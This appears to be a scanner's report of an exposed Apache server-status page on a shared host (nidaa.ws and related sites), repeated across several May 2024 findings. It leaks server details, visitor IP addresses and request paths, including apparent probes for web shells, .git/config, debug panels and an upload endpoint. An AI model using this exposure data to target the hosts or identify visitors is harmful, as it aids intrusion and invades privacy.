      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-6131530/461/5064_
      52.79315834844610.029.77653.60
      5.109.221.167http/1.1zed.brunch.ws:443GET /storage/media/image/5gtrkz8dGIJqe8GmrvnT6Y0tndcH7yolUMLCRm
      
      0-6131530/341/4324_
      53.0314911918807000.016.23551.56
      78.95.157.62http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-6131530/413/4750_
      53.1047222178640.018.19639.91
      104.254.244.98http/1.1php.we3dvi.com:443GET /wp-admin/user/index.php HTTP/1.1
      
      0-6131530/350/4498_
      53.021510350991540.040.36583.54
      66.249.64.10http/1.1albayan.edu.sa:80GET /web/34.html2 HTTP/1.1
      
      0-6131530/399/4631_
      53.00246145094040.028.26738.19
      5.109.237.222http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/06ZDR2ukMEKX31ZcbKhfUg
      
      0-6131530/410/4423_
      52.76360338499160.0122.54787.97
      5.82.55.99http/1.1zed.sa:443GET /menu/wp-includes/js/imagesloaded.min.js?ver=6.5.3 HTTP/1.1
      
      0-6131530/403/4610_
      53.03106334438930.021.03581.74
      66.249.64.9http/1.1hawsab.me:80GET /?cuw19420lchtbciz591.html HTTP/1.1
      
      0-6131530/416/4371_
      53.01205026708290.079.75706.23
      3.249.171.39http/1.1albayan.edu.sa:80GET /web/250.html2 HTTP/1.1
      
      0-6131530/368/5030_
      52.95251113637529920.063.32779.02
      142.154.27.212http/1.1albayan.edu.sa:443GET /imgweb/1445/5/1%20-%20%D8%A7%D9%84%D8%AF%D8%B1%D8%A7%D8%B3
      
      0-6131530/358/4490_
      52.86305230048470.040.78815.87
      104.254.244.98http/1.1php.we3dvi.com:443GET /wp-includes/pomo/index.php HTTP/1.1
      
      0-6131531/386/4212K
      53.1602228162320.855.89558.67
      162.158.110.202http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-6131532/411/5089K
      53.16012539004238.516.82443.02
      66.249.70.64http/1.1sulaimaniya.edu.sa:443GET /wp-content/plugins/revslider/public/assets/js/jquery.theme
      
      0-6131530/390/4552_
      52.91268237616100.056.80964.78
      66.118.153.253http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-6131530/423/4640_
      52.85305428905730.044.87812.54
      5.109.237.222http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/1D92GOCkUUxk9KBgmE7pG7
      
      0-6131530/431/4775_
      53.021779036652340.017.22590.37
      107.189.1.184http/1.1sulaimaniya.edu.sa:443POST /wp-login.php HTTP/1.1
      
      0-6131530/403/4444_
      53.1214521604480.027.05651.44
      66.249.64.8http/1.13dvi.com:443GET /css/ar/floating-wpp.css HTTP/1.1
      
      0-6131530/435/4393_
      52.713829004726715750.057.97769.64
      95.185.137.21http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/7c9eOpnDeL52Q2akz7kxy7
      
      0-6131530/390/4592_
      53.1581549134440.078.66711.77
      66.249.70.6http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-6131530/391/4811_
      52.922637023408620.020.20704.07
      114.119.141.112http/1.1daris.live:443GET /product/part/54/214 HTTP/1.1
      
      0-6131530/371/4585_
      53.012421232537760.088.10636.17
      5.109.237.222http/1.1jawad.com.sa:443POST /api/v.1/front/rating/like HTTP/1.1
      
      0-6131530/450/4459_
      53.097638200490920.0130.01638.89
      114.119.139.61http/1.1daris.live:80GET /product/fav/91 HTTP/1.1
      
      0-6131530/465/4679_
      52.9425312422633740.015.33632.40
      5.109.237.222http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/eQRPy6dYXrA73vWpwQ21z0
      
      0-6131530/641/4734_
      53.09539021729397810.069.51731.28
      78.95.157.62http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-6131530/428/4761_
      52.7733530928155690.067.91625.36
      66.249.64.12http/1.1albayan.edu.sa:443GET /imgweb/1445/sc2.pdf HTTP/1.1
      
      0-6131530/423/4699_
      52.76360024707760.0103.18806.35
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      1-6135160/397/4058_
      49.6818541968410.020.93778.82
      66.249.70.165http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=1864 HTTP/1.1
      
      1-6135160/418/4396_
      49.253187941574060.011.53677.20
      172.70.203.138http/1.1qr.brunch.ws:443POST /foods/13 HTTP/1.1
      
      1-6135160/369/4598_
      49.452023935909790.042.81722.49
      66.249.70.164http/1.1albayan.edu.sa:443GET /web/311.html2 HTTP/1.1
      
      1-6135160/385/4493_
      49.7341531517760.022.04632.62
      60.13.138.145http/1.1trynidaa.com:443GET /gaocc/g445g HTTP/1.1
      
      1-6135160/351/4290_
      49.63113232171760.0114.06678.93
      104.254.244.98http/1.1php.we3dvi.com:443GET /wp-admin/images/index.php HTTP/1.1
      
      1-6135160/348/4188_
      49.58138026762250.0100.70615.44
      66.249.64.9http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=1622&page=1 HTTP/1.1
      
      1-6135160/407/4406_
      49.44246153561190.021.27680.71
      5.109.237.222http/1.
      Found on 2024-05-30 12:11
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df746f589a4

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 29-May-2024 22:51:54 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  6 days 18 hours 47 minutes 4 seconds
      Server load: 0.02 0.03 0.05
      Total accesses: 917040 - Total Traffic: 135.1 GB - Total Duration: 1022462131
      CPU Usage: u342.51 s25.93 cu4015.47 cs875.86 - .898% CPU load
      1.56 requests/sec - 241.8 kB/second - 154.5 kB/request - 1114.96 ms/request
      15 requests currently being processed, 0 workers gracefully restarting, 185 idle workers
      ________________K___________K__________K_____________________K__
      _________W_________________________R.................W.......WWW
      WWWWWWWWWWWWWWWWWWWWWWC_________________K_______________________
      ____KK__RK__________________W____...............................
      ............................................______________K_____
      ___R_...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5269680/43/4505_
      7.3610064632568360.00.77618.69
      178.128.207.138http/1.1zed.sa:80GET /.git/config HTTP/1.1
      
      0-5269680/55/3929_
      7.20308618487200.013.90534.23
      172.68.97.136http/1.1qr.brunch.ws:443GET /storage/food_image/17162870753282_sparklingwaterlarge.jpg 
      
      0-5269680/43/4233_
      7.18308420426970.019.49608.76
      172.68.97.131http/1.1qr.brunch.ws:443GET /storage/food_image/17162861147551_hotchocolat.jpg HTTP/1.1
      
      0-5269680/56/4091_
      7.37883350025040.04.18540.69
      5.82.206.156http/1.1albayan.edu.sa:443GET /registration/asset/preloader.css HTTP/1.1
      
      0-5269680/58/4174_
      7.232701044463140.04.14705.13
      5.109.31.155http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-5269680/74/3956_
      7.30216534753730.03.90663.61
      66.249.64.13http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1865 HTTP/1.1
      
      0-5269680/56/4158_
      7.35108031764240.04.27556.15
      5.82.206.156http/1.1albayan.edu.sa:443GET /registration/asset/preloader.css HTTP/1.1
      
      0-5269680/54/3916_
      7.351122025500430.03.44625.65
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-5269680/77/4607_
      7.20308533931820.021.55711.48
      172.68.97.143http/1.1qr.brunch.ws:443GET /storage/food_image/17088536269753_img680e14be8cba4bfcb7f68
      
      0-5269680/14/4085_
      7.3610376728642390.04.09770.56
      eab9c05722.scan.leakix.orghttp/1.1zed.sa:80GET /server-status HTTP/1.1
      
      0-5269680/89/3786_
      7.36102328225450200.04.17500.38
      37.106.192.29http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%AF%D8%B1%
      
      0-5269680/80/4571_
      7.19308524569830.06.75418.77
      172.68.97.130http/1.1qr.brunch.ws:443GET /storage/food_image/17162865913767_raspberrypistachioespres
      
      0-5269680/36/4106_
      7.31206436822620.00.83905.13
      66.249.70.164http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1227 HTTP/1.1
      
      0-5269680/48/4168_
      7.369864425773890.00.99763.93
      178.128.207.138http/1.1zed.sa:80GET /telescope/requests HTTP/1.1
      
      0-5269680/63/4308_
      6.98246235738450.06.39572.09
      95.187.35.182http/1.1
      
      0-5269680/53/3979_
      7.31117020752820.03.60621.46
      5.82.206.156http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-5269681/39/3896K
      7.390123099410.89.38709.03
      172.69.150.102http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-5269680/35/4162_
      7.3993347844520.021.85632.25
      193.3.35.90http/1.1alezdhar.com:443GET /wp-login.php HTTP/1.1
      
      0-5269680/26/4333_
      7.1830824222752980.00.93679.10
      172.68.97.148http/1.1qr.brunch.ws:443GET /storage/food_image/17088544068106_imge898a9bef8f942f99cf7c
      
      0-5269680/48/4173_
      7.27265331576530.03.63545.14
      5.109.31.155http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      0-5269680/28/3964_
      7.16272199151140.010.54507.77
      37.106.192.29http/1.1
      
      0-5269680/78/4135_
      7.20305119820295650.08.50613.92
      172.68.97.148http/1.1qr.brunch.ws:443GET /storage/food_image/17085203627110_imgba5677885d994e3f8d943
      
      0-5269680/39/4042_
      7.18308326932580.027.35656.91
      172.68.97.145http/1.1qr.brunch.ws:443GET /storage/food_image/17162860389733_maisonteacup.jpg HTTP/1.
      
      0-5269680/53/4279_
      7.28258323283180.02.05555.29
      95.187.35.182http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-5269680/55/4241_
      7.21297123893520.05.75702.18
      77.31.204.60http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-556500/105/3599_
      23.87308141256670.013.02756.87
      172.68.97.139http/1.1qr.brunch.ws:443GET /storage/food_image/17096783429150_lamp.webp HTTP/1.1
      
      1-556500/112/3934_
      24.02545137250530.028.21641.63
      103.212.98.210http/1.13dvi.com:443GET /admin/assets/jquery-file-upload/server/php/index.php?file=
      
      1-556500/147/4179_
      23.9621541231847730.028.74675.93
      66.249.70.164http/1.1albayan.edu.sa:443GET /imgweb/files41/2%D8%AC%D8%AF%D8%A7%D9%88%D9%84%20%D8%A7%D9
      
      1-556501/172/4065K
      24.034230638377.418.87607.73
      168.149.60.168http/1.1alezdhar.com:443GET /videos/Zed-1296-1.mp4 HTTP/1.1
      
      1-556500/157/3888_
      23.99116231524800.047.27562.55
      5.82.206.156http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/shad_tile.png HTTP
      
      1-556500/164/3776_
      23.932713923141010.024.87511.07
      95.187.35.182http/1.1albayan.edu.sa:443GET /web/396.html2 HTTP/1.1
      
      1-556500/201/3925_
      24.0282450990340.0104.92655.16
      66.249.70.164http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1646 HTTP/1.1
      
      1-55650
      Found on 2024-05-29 19:51
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df759e92707

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 29-May-2024 21:06:19 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  6 days 17 hours 1 minute 29 seconds
      Server load: 0.00 0.07 0.13
      Total accesses: 909332 - Total Traffic: 133.2 GB - Total Duration: 1005624934
      CPU Usage: u481.64 s56.48 cu3839.66 cs835.84 - .899% CPU load
      1.57 requests/sec - 241.0 kB/second - 153.6 kB/request - 1105.89 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 214 idle workers
      _____R_____________K______________________________..............
      ....................................______K__________W_______WWW
      WWWWWWWWWWWWWWWWWWWWWW_____________K____________K_______________
      _____________W______K_____________________K_____________________
      _________________K_______________K__________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-592140/62/4458_
      11.97149432535690.04.83617.88
      188.114.102.85http/1.1qr.brunch.ws:443GET /storage/food_image/17162858719396_iceespresso.jpg HTTP/1.1
      
      0-592140/75/3866_
      11.92149217111820.012.00518.33
      188.114.102.115http/1.1qr.brunch.ws:443GET /storage/food_image/17085190389947_img50a6ea78846249e9820d1
      
      0-592140/100/4186_
      12.0544020169380.05.98588.81
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1194&t=167.114.158.241&c=5 HT
      
      0-592140/112/4031_
      11.911492349940770.024.87536.16
      188.114.102.136http/1.1qr.brunch.ws:443GET /storage/food_image/17095826881606_smokesalmomcroissant.jpg
      
      0-592140/58/4108_
      11.96149443976120.03.72700.85
      188.114.103.10http/1.1qr.brunch.ws:443GET /storage/food_image/17088535992345_img87d03a054fb04c81a8cc3
      
      0-592140/73/3879R
      11.851783232160660.01.91659.67
      51.235.185.25http/1.1
      
      0-592140/88/4093_
      11.98148331557140.08.45551.80
      188.114.102.196http/1.1qr.brunch.ws:443GET /storage/food_image/17162861459998_latte.jpg HTTP/1.1
      
      0-592140/61/3846_
      11.90149225394850.02.66621.50
      188.114.103.5http/1.1qr.brunch.ws:443GET /storage/food_image/17095843258766_sunyside.webp HTTP/1.1
      
      0-592140/80/4525_
      11.801461731746700.034.34689.58
      101.198.0.182http/1.1
      
      0-592140/67/4065_
      11.92149128547430.030.11732.79
      188.114.102.35http/1.1qr.brunch.ws:443GET /storage/food_image/17088542817700_imgc01ee519ff8f4d21ab979
      
      0-592140/110/3690_
      11.931491224360560.01.66469.04
      188.114.102.100http/1.1qr.brunch.ws:443GET /storage/food_image/17088519231693_img3622bfc18d474ecfbcfea
      
      0-592140/81/4483_
      12.055747924208510.05.01410.83
      66.249.70.64http/1.1sulaimaniya.edu.sa:443GET /2016/02/04/%D8%A8%D9%81%D8%B6%D9%84-%D8%A7%D9%84%D9%84%D9%
      
      0-592140/103/4063_
      11.98148334513560.036.24903.74
      188.114.102.113http/1.1qr.brunch.ws:443GET /storage/food_image/17162864712835_mocha.jpg HTTP/1.1
      
      0-592140/57/4117_
      12.0212513125731730.03.01762.92
      5.82.109.229http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-592140/74/4241_
      11.88149335498340.031.91565.46
      188.114.102.98http/1.1qr.brunch.ws:443GET /storage/food_image/17096768073919_margherita.webp HTTP/1.1
      
      0-592140/82/3923_
      12.02116018423470.05.24617.68
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1070&t=88.198.33.145&c=5 HTTP
      
      0-592140/74/3844_
      12.01136022762680.033.10698.17
      20.246.194.116http/1.1wahjcm.com:80GET /wp-login.php HTTP/1.1
      
      0-592140/80/4121_
      11.95149527415300.023.84609.87
      188.114.102.167http/1.1qr.brunch.ws:443GET /storage/food_image/17088534061749_img771a2b02697a4cf288e2c
      
      0-592140/66/4301_
      11.99148622696970.020.99676.96
      188.114.102.61http/1.1qr.brunch.ws:443GET /storage/food_image/17088458847942_oip6.jpg HTTP/1.1
      
      0-592142/94/4121K
      12.0602315422167.69.09540.81
      172.70.251.195http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-592140/99/3922_
      11.981488198695570.07.65495.92
      188.114.102.185http/1.1qr.brunch.ws:443GET /storage/food_image/17162860982324_cortado.jpg HTTP/1.1
      
      0-592140/98/4051_
      12.0632020057680.08.65605.28
      77.223.230.94http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-592140/88/3999_
      11.94149526807060.010.38629.00
      188.114.102.79http/1.1qr.brunch.ws:443GET /storage/food_image/17096771367772_fajita.webp HTTP/1.1
      
      0-592140/93/4223_
      12.01128023261980.04.97553.20
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=816&t=136.243.37.219&c=5 HTTP
      
      0-592140/71/4182_
      11.88149422485760.010.15696.12
      188.114.102.212http/1.1qr.brunch.ws:443GET /storage/food_image/17096759125693_pompgranet.webp HTTP/1.1
      
      1-556500/76/3570_
      15.29149240533000.03.27747.12
      188.114.102.217http/1.1qr.brunch.ws:443GET /storage/food_image/17095847871371_eggbacon.jpg HTTP/1.1
      
      1-556500/72/3894_
      15.41538336879130.01.82615.24
      66.249.66.82http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=665&page=1 HTTP/1.1
      
      1-556500/119/4151_
      15.27149031819760.027.07674.26
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=&t=5.9.152.170&c=5 HTTP/1.1
      
      1-556500/121/4014_
      15.28149230448780.015.27604.12
      188.114.102.89http/1.1qr.brunch.ws:443GET /storage/food_image/17096750977521_granola.webp HTTP/1.1
      
      1-556500/113/3844_
      15.33149429183300.032.07547.35
      188.114.102.202http/1.1qr.brunch.ws:443GET /storage/food_image/17096777827045_tresh.webp HTTP/1.1
      
      1-556500/103/3715_
      15.34149422986580.021.96508.17
      188.114.102.55http/1.1qr.brunch.ws:443GET /storage/food_image/17
      Found on 2024-05-29 18:06
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7609b0ea1

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 28-May-2024 22:04:30 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  5 days 17 hours 59 minutes 40 seconds
      Server load: 0.22 0.35 0.39
      Total accesses: 799449 - Total Traffic: 113.4 GB - Total Duration: 866094624
      CPU Usage: u436.2 s51.84 cu3322.5 cs725.82 - .913% CPU load
      1.61 requests/sec - 239.3 kB/second - 148.7 kB/request - 1083.36 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 239 idle workers
      _____________K____K_W_________________________K_______K_________
      ________________K______________________________________K_____WWW
      WWWWWWWWWWWWWWWWWWWWWWK_________________________________________
      ______K_.........................______K________________________
      ___W_______________.........................____________________
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5240290/333/4063_
      28.05291332055870.013.62594.87
      51.235.163.50http/1.1
      
      0-5240290/197/3387_
      28.36154316248350.011.11443.38
      51.36.227.138http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/YO0EQAvCa2ZH2wioRGOk6r
      
      0-5240290/224/3720_
      28.2732112218716320.088.82532.05
      5.163.89.167http/1.1albayan.edu.sa:443GET /e_sch/js/jquery-1.6.1.min.js HTTP/1.1
      
      0-5240290/180/3577_
      28.27295231347739440.011.73422.81
      95.187.93.133http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-5240290/172/3667_
      28.2241925127005260.070.39624.84
      5.157.43.44http/1.1sulaimaniya.edu.sa:443GET /%d8%a7%d9%84%d9%85%d8%b1%d8%ad%d9%84%d8%a9-%d8%a7%d9%84%d8
      
      0-5240290/170/3445_
      28.30213430618540.049.99470.55
      176.224.73.194http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-5240290/213/3675_
      28.1219828025236630.063.31489.48
      93.112.135.237http/1.1
      
      0-5240290/221/3507_
      28.21421323861490.027.20570.17
      37.106.137.63http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-5240290/178/4010_
      28.3117543430058570.031.95630.41
      5.245.4.145http/1.1albayan.edu.sa:443GET /imgweb/file44/11111%20(1).pdf HTTP/1.1
      
      0-5240290/189/3671_
      28.2341321527280430.0135.54589.29
      109.230.220.203http/1.1sulaimaniya.edu.sa:443GET /%d8%a7%d9%84%d9%85%d8%b1%d8%ad%d9%84%d8%a9-%d8%a7%d9%84%d9
      
      0-5240290/190/3206_
      28.10218222223749090.09.79445.75
      93.112.135.237http/1.1
      
      0-5240290/262/4037_
      28.2340424623689580.036.41388.63
      185.104.219.255http/1.1sulaimaniya.edu.sa:443GET /%d8%a7%d9%84%d9%85%d9%82%d8%b5%d9%81/ HTTP/1.1
      
      0-5240290/201/3675_
      28.34164432651290.038.29776.00
      2.90.183.140http/1.1albayan.edu.sa:443GET /e_sch/source/inettuts.css HTTP/1.1
      
      0-5240291/228/3688K
      28.3741024693598.777.88678.86
      172.68.225.177http/1.1adyar.com.sa:80GET / HTTP/1.1
      
      0-5240290/241/3827_
      28.2439621433831800.017.57466.63
      185.28.181.229http/1.1sulaimaniya.edu.sa:443GET /%d8%a7%d9%84%d8%aa%d8%b9%d9%84%d9%85-%d8%a7%d9%84%d8%a7%d9
      
      0-5240290/216/3479_
      28.379921316988000.019.63561.75
      95.185.6.82http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-5240290/223/3379_
      28.28247322052140.017.24614.54
      138.201.201.48http/1.1trynidaa.com:80POST /wp-cron.php?doing_wp_cron=1716922823.37652611732482910156
      
      0-5240290/167/3546_
      28.0539122322499310.015.53509.83
      193.186.4.95http/1.1
      
      0-5240291/179/3793K
      28.370118940760.927.53541.58
      172.69.194.250http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-5240290/225/3632_
      28.31207228139550.010.74433.97
      31.166.178.106http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-5240290/179/3546W
      27.431268026182570.027.20457.07
      65.154.226.169http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-5240290/213/3618_
      28.3316343617528720.011.40473.76
      51.36.227.138http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/________%20________%20
      
      0-5240290/205/3603_
      28.253199325326490.062.75555.08
      176.224.36.169http/1.1albayan.edu.sa:443GET /e_sch/images/Background.jpg HTTP/1.1
      
      0-5240290/180/3705_
      28.28266218511190.059.44491.59
      188.50.185.178http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-5240290/165/3778_
      28.282462220660320.053.90663.40
      138.197.191.87http/1.1trynidaa.com:80GET /_all_dbs HTTP/1.1
      
      1-5277640/146/3224_
      25.5039926338903420.074.79654.76
      198.240.90.197http/1.1sulaimaniya.edu.sa:443GET /%d8%b7%d8%a7%d9%84%d8%a8/ HTTP/1.1
      
      1-5277640/200/3517_
      25.582505231784880.077.16543.65
      5.156.51.135http/1.1jawad.com.sa:443GET /ar/category/61 HTTP/1.1
      
      1-5277640/212/3745_
      25.57269324767790.034.16585.34
      151.254.128.157http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-5277640/182/3486_
      25.6417170524066740.010.43531.82
      168.119.151.109http/1.1zed.sa:80POST /wp-content/db-cache.php HTTP/1.1
      
      1-5277640/145/3421_
      25.46429328269330.036.71499.54
      94.96.141.7http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      1-5277640/207/3341_
      25.32416118860530.016.63437.83
      157.230.255.101http/1.1
      
      1-5277640/243/3473_
      25.24354428477640.023.69481.61
      51.252.143.99http/1.1
      
      1-5277640/179/3492_
      25.54319226537220.026.74483.00
      5.163.89.167http/1.1
      Found on 2024-05-28 19:04
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df712e65a45

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 28-May-2024 19:05:18 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  5 days 15 hours 28 seconds
      Server load: 0.39 0.39 0.41
      Total accesses: 781197 - Total Traffic: 110.0 GB - Total Duration: 832908594
      CPU Usage: u346.82 s34.21 cu3322.5 cs725.82 - .911% CPU load
      1.61 requests/sec - 237.3 kB/second - 147.7 kB/request - 1066.2 ms/request
      20 requests currently being processed, 0 workers gracefully restarting, 205 idle workers
      _____R_K______________________K____________K_______K____________
      R________R__KK__________________________W_____K______________WWW
      WWWWWWWWWWWWWWWWWWWWWW_____K__K_______K________.................
      ................................._____________________K________K
      _________________K_.........................____________K_______
      K__K_...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
